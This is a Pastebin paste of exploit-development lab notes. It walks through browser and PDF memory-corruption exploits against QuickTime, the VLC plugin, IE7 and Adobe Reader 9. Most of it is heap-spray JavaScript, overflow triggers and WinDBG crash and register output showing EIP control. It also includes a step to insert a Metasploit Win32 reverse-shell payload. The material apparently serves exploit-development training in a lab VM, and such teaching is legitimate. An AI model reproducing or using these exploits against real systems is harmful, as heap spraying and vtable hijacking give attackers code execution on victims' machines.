Advertisement
joemccray

Browser Exploits

Dec 4th, 2015
1,604
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.23 KB | None | 0 0
  1. ################################
  2. # Lab 1: Overflows in browsers #
  3. ################################
  4.  
  5. Quicktime - overflow, if we send a very long rtsp:// URL, Quicktime crashes
  6. rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA......50000
  7.  
  8. <object id=quicktime clsid="999-999999-99-99999">
  9. <param name="URL" value="rtsp://AAAAAAAAAAAAAAAAAAAAAAAAA....">
  10. </object>
  11.  
  12. var buf = "";
  13. for(i = 0; i < 50000; i++)
  14. buf += "A";
  15. var myobject = document.getElementById("quicktime");
  16. myobject.url = buf;
  17.  
  18. YOU CAN PRE-LOAD THE PROCESS MEMORY MORE OR LESS IN A WAY YOU LIKE BEFORE TRIGGERING THE EXPLOIT!!!!
  19.  
  20. - Browsers (Flash)
  21. - PDF
  22. - MS Office / OOo
  23.  
  24. VLC smb:// exploit
  25. ------------------
  26.  
  27. EXPLOIT VECTOR
  28.  
  29. smb://example.com@0.0.0.0/foo/#{AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA}
  30.  
  31. Exploit Scripts
  32. - ffvlc
  33.  
  34. ON YOUR HOST, RUN THE WEBSERVER ON PORT 8080
  35.  
  36. perl daemon.py vlc0.html
  37.  
  38. ON YOUR XPIE8 VM, START FIREFOX
  39. Browse to http://your_host_ip_address:8080/
  40.  
  41. vlc0.html
  42. ---------
  43. <script>
  44. var buf = "";
  45. for(i = 0; i < 1250; i++)
  46. buf += unescape("%41%41%41%41");
  47. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  48. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  49. </script>
  50.  
  51. vlc1.html
  52. ---------
  53. <script>
  54.  
  55. // shellcode created in heap memory
  56. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  57.  
  58. // 800K block of NOPS
  59. var nop = unescape("%u9090%u09090"); // 4 NOPS
  60. while(nop.length < 0xc0000) {
  61. nop += nop;
  62. }
  63.  
  64. // spray the heap with NOP+shellcode
  65. var memory = new Array();
  66. for(i = 0; i < 50; i++) {
  67. memory[i] = nop + shellcode;
  68. }
  69.  
  70. // build the exploit payload
  71. var buf = "";
  72. for(i = 0; i < 1250; i++)
  73. buf += unescape("%41%41%41%41");
  74. var track = "smb://example.com\@0.0.0.0/foo/#{" + buf + "}";
  75.  
  76. // trigger the exploit
  77. document.write("<embed type='application/x-vlc-plugin' target='" + track + "' />");
  78. </script>
  79.  
  80. perl daemon.py vlc1.html
  81.  
  82. Search for where our NOPS+shellcode lies in the heap
  83.  
  84. s 0 l fffffff 90 90 90 90 cc cc cc cc
  85.  
  86. 0:019> s 0 l fffffff 90 90 90 90 cc cc cc cc
  87. 03dffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  88. 040ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  89. 043ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  90. 046ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  91. 049ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  92. 04cffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  93. 04fffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  94. 052ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  95. 055ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  96. 058ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  97. 05bffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  98. 05effffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  99. 061ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  100. 064ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  101. 067ffffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  102. 06affffc 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc cc ................
  103.  
  104. Edit vlc2.html
  105. replace %41%41%41%41 with %07%07%07%07
  106.  
  107. (928.fd0): Break instruction exception - code 80000003 (first chance)
  108. eax=fffffd66 ebx=07070707 ecx=77c2c2e3 edx=00340000 esi=07070707 edi=07070707
  109. eip=07100000 esp=0e7afc58 ebp=07070707 iopl=0 nv up ei pl nz ac pe nc
  110. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000216
  111. 07100000 cc int 3
  112. 0:019> u
  113. 07100000 cc int 3
  114. 07100001 cc int 3
  115. 07100002 cc int 3
  116. 07100003 cc int 3
  117. 07100004 cc int 3
  118. 07100005 cc int 3
  119. 07100006 cc int 3
  120. 07100007 cc int 3
  121.  
  122. Create vlc3.html (Copy vlc2.html to vlc3.html)
  123. ----------------------------------------------
  124. Win32 Reverse Shell
  125. - no restricted characters
  126. - Encoder NONE
  127. - use the Javascript encoded payload generated by msfweb
  128.  
  129. USE AFTER FREE
  130. --------------
  131.  
  132. struct {
  133. int a;
  134. int b;
  135. void (*add)();
  136. char c[20];
  137. } s1, s2;
  138.  
  139. s1.a = 3;
  140. s1.b = 4;
  141. s1.add = my_add_func();
  142. strcpy(s1.c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAA");
  143. :
  144. :
  145. s2.add(x, y);
  146. :
  147.  
  148. Exploit scripts
  149. ie7-ms09002
  150.  
  151. perl daemon.py ie7imgtag0.html
  152.  
  153. First chance exceptions are reported before any exception handling.
  154. This exception may be expected and handled.
  155. eax=025445a0 ebx=00000000 ecx=4141ffff edx=00000002 esi=02545678 edi=80020003
  156. eip=7e8999cb esp=01e8f68c ebp=01e8f694 iopl=0 nv up ei pl nz na po nc
  157. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  158. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Internet Explorer Collection\IE700\mshtml.dll -
  159. mshtml!DllGetClassObject+0x4ec28:
  160. 7e8999cb ff5104 call dword ptr [ecx+4] ds:0023:41420003=????????
  161.  
  162. WHENEVER YOU HAVE A CRASH WHERE YOU FAULT ON:
  163.  
  164. call dword ptr [reg + N]
  165.  
  166. You control the reg value (completely or partially)
  167.  
  168. You have an exploitable vtable overwrite.
  169.  
  170. u eip-3 <--- check 3 instructions before the crash
  171. 0:005> u eip-3
  172. mshtml!DllGetClassObject+0x4ec25:
  173. 7e8999c8 8b08 mov ecx,dword ptr [eax]
  174. 7e8999ca 50 push eax
  175. 7e8999cb ff5104 call dword ptr [ecx+4]
  176.  
  177. dd eax
  178. 0:005> dd eax
  179. 025445a0 4141ffff 00420042 00420042 00420042
  180. 025445b0 00420042 00420042 00420042 00420042
  181. 025445c0 00420042 00420042 00420042 00420042
  182. 025445d0 00420042 00000042 e8b9ce43 ff080100
  183.  
  184. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
  185.  
  186. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  187. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  188. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  189. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  190. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  191. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  192. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  193. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  194. <img src="%u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB">
  195. :
  196. :
  197.  
  198. EAX register ends up pointing to one of these src values
  199. %u4141%u4141BBBBBBBBBBBBBBBBBBBBBBBBB
  200.  
  201. EAX points to ---> 4141ffff B B B B B B ...
  202. mov ecx, [eax]
  203. - what will ecx be? ECX = 4141ffff
  204. push eax
  205. call dword ptr [ecx+4]
  206. - EIP will jump to whatever is at memory location 4141ffff+4 = 41420003
  207.  
  208. ie7imgtag1.html
  209. ---------------
  210.  
  211. var buf = unescape("%u0606%u0606BBBBBBBBBBBBBBBBBBBBBBBBB");
  212.  
  213. EAX points to ---> 0606ffff B B B B B B ...
  214. mov ecx, [eax]
  215. - ecx = 0606ffff
  216.  
  217. call [ecx+4]
  218. - call [06070003]
  219.  
  220. Do we control the memory at 06070003?
  221.  
  222. dd 04040404 ........ 90 90 90 90 90 90 90
  223. dd 05050505 ........ 90 90 90 90 90 90 90
  224. dd 06060606 ........ 90 90 90 90 90 90 90
  225.  
  226. 06070003 --> 90909090
  227.  
  228. dd 07070707 ........ 90 90 90 90 90 90 90
  229.  
  230. EIP = 90909090 (whatever is stored at location 06070003)
  231.  
  232.  
  233.  
  234.  
  235.  
  236.  
  237. #######################
  238. # Lab 2: PDF EXPLOITS #
  239. #######################
  240.  
  241. Acrobat Media newPlayer exploit
  242. -------------------------------
  243.  
  244. Use-after-free bug
  245.  
  246. Exploit scripts are online at 172.16.0.100
  247. - adobe_mnp
  248.  
  249. Download these scripts on your XPIE8 VM itself.
  250.  
  251.  
  252. mnp0.pdf
  253.  
  254. - Open up acrobat reader
  255. - WinDBG
  256. - F6 attach to AcroRd32.exe
  257. - g to Go
  258.  
  259. EIP = 41414141
  260.  
  261. Next step is to spray the heap with NOPS+shellcode, and then land EIP in the heap.
  262.  
  263. mnp1.pdf
  264.  
  265. All we are doing is changing EIP to 0c0c0c0c.
  266. There is no heap spray in this one.
  267.  
  268. This exception may be expected and handled.
  269. eax=02e2d638 ebx=23826917 ecx=02e2d638 edx=02e2f868 esi=02c07674 edi=02c07674
  270. eip=0c0c0c0c esp=0013fb38 ebp=0013fbb8 iopl=0 nv up ei pl nz na po nc
  271. cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
  272. 0c0c0c0c ?? ???
  273.  
  274. We know we get EIP control
  275.  
  276. mnp2.pdf
  277.  
  278. Put in the heap spray.
  279.  
  280. var shellcode = unescape("%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc%ucccc");
  281.  
  282. var nops = unescape("%u9090%u9090");
  283.  
  284. while(nops.length <= 32768)
  285. nops += nops;
  286. nops = nops.substring(0,32768 - shellcode.length);
  287.  
  288. memory = new Array();
  289.  
  290. for(i = 0; i < 1500; i++) {
  291. memory[i] = nops + shellcode;
  292. }
  293.  
  294. 1500 NOP+shellcode blocks of 32K NOPs each
  295.  
  296. We would have sprayed over address 0c0c0c0c, and we hope to hit EIP = 0c0c0c0c, and get INT3.
  297.  
  298. We want to see what led to the crash.
  299.  
  300. EIP is invalid, so we can't disassemble around EIP
  301.  
  302. We need to trace the function that called us and crashed.
  303. - STACK TRACE
  304. - Dumps all the frames from the top of the stack.
  305. - show you the series of calls that led up to the crash.
  306. - we will analyze the topmost function on the frame.
  307.  
  308. WinDBG - stack trace - "k" command
  309.  
  310. 0:000> k
  311. ChildEBP RetAddr
  312. WARNING: Frame IP not in any known module. Following frames may be wrong.
  313. 0013fb34 2d843117 0x90909090
  314. 0013fbb8 23826934 Multimedia!PlugInMain+0x41b69
  315. 0013fbdc 23825d8c EScript!PlugInMain+0x25584
  316. 0013fc74 238257e2 EScript!PlugInMain+0x249dc
  317. 0013fca4 238543c5 EScript!PlugInMain+0x24432
  318. 0013fd04 00a78de1 EScript!PlugInMain+0x53015
  319. 0013fd20 7e418734 AcroRd32_940000!DllCanUnloadNow+0x67290
  320. 0013fd4c 7e418816 USER32!InternalCallWinProc+0x28
  321. 0013fdb4 7e4189cd USER32!UserCallWinProcCheckWow+0x150
  322. 0013fe14 7e418a10 USER32!DispatchMessageWorker+0x306
  323. 0013fe24 00a323b4 USER32!DispatchMessageW+0xf
  324. 0013fe94 00a31de8 AcroRd32_940000!DllCanUnloadNow+0x20863
  325. 0013fecc 0094389f AcroRd32_940000!DllCanUnloadNow+0x20297
  326. 0013fee4 009436ee AcroRd32_940000!AcroWinMain+0x1c8
  327. 0013ff2c 00404004 AcroRd32_940000!AcroWinMain+0x17
  328. 0013ffc0 7c817067 AcroRd32+0x4004
  329. 0013fff0 00000000 kernel32!BaseProcessStart+0x23
  330.  
  331. 2d843117 -- the return address that we would have returned to, if we didnt crash.
  332. address 2d843117-2 we will have a CALL instruction.
  333.  
  334. u 2d843117
  335. u 2d843117-2
  336. u 2d843117-3 <---- we found the CALL instruction - call [edx+4]
  337. u 2d843117-4
  338.  
  339. 0:000> u 2d843117-3
  340. Multimedia!PlugInMain+0x41b66:
  341. 2d843114 ff5204 call dword ptr [edx+4] <---- the culprit!!!
  342. 2d843117 6a00 push 0
  343. 2d843119 68d8b68c2d push offset Multimedia!PlugInMain+0xca12a (2d8cb6d8)
  344. 2d84311e 56 push esi
  345. 2d84311f e842aefdff call Multimedia!PlugInMain+0x1c9b8 (2d81df66)
  346. 2d843124 83c40c add esp,0Ch
  347. 2d843127 66b80100 mov ax,1
  348. 2d84312b 5e pop esi
  349.  
  350. We control EDX
  351. edx=0c0c0c0c
  352.  
  353. call [edx+4] = call [0c0c0c10]
  354. dd edx+4
  355.  
  356. 0:000> dd edx+4
  357. 0c0c0c10 90909090 90909090 90909090 90909090
  358. 0c0c0c20 90909090 90909090 90909090 90909090
  359.  
  360. 0:000> u 2d843117-7
  361. Multimedia!PlugInMain+0x41b62:
  362. 2d843110 8b10 mov edx,dword ptr [eax]
  363. 2d843112 8bc8 mov ecx,eax
  364. 2d843114 ff5204 call dword ptr [edx+4]
  365.  
  366. dd eax
  367.  
  368. 0:000> dd eax
  369. 02e2d680 0c0c0c0c 0c0c0c0c 0c0c0c0c 0c0c0c0c
  370. 02e2d690 42424242 42424242 42424242 42424242
  371. 02e2d6a0 42424242 42424242 42424242 42424242
  372. 02e2d6b0 42424242 42424242 42424242 42424242
  373. 02e2d6c0 42424242 42424242 00000000 00000000
  374.  
  375. mnp3.pdf
  376.  
  377. change the NOPs 90909090 to 0c0c0c0c
  378.  
  379. mov edx, [eax]
  380. call [edx+4]
  381.  
  382. edx = 0c0c0c0c
  383. edx+4 = 0c0c0c10
  384. contents at edx+4 will also be "0c0c0c0c"
  385.  
  386. EIP will jump to 0c0c0c0c
  387.  
  388. and...
  389.  
  390. 0:000> u 0c0c0c0c
  391. *** WARNING: Unable to verify checksum for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api
  392. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Adobe\Reader 9.0\Reader\plug_ins\Multimedia.api -
  393. 0c0c0c0c 0c0c or al,0Ch
  394. 0c0c0c0e 0c0c or al,0Ch
  395. 0c0c0c10 0c0c or al,0Ch
  396. 0c0c0c12 0c0c or al,0Ch
  397. 0c0c0c14 0c0c or al,0Ch
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement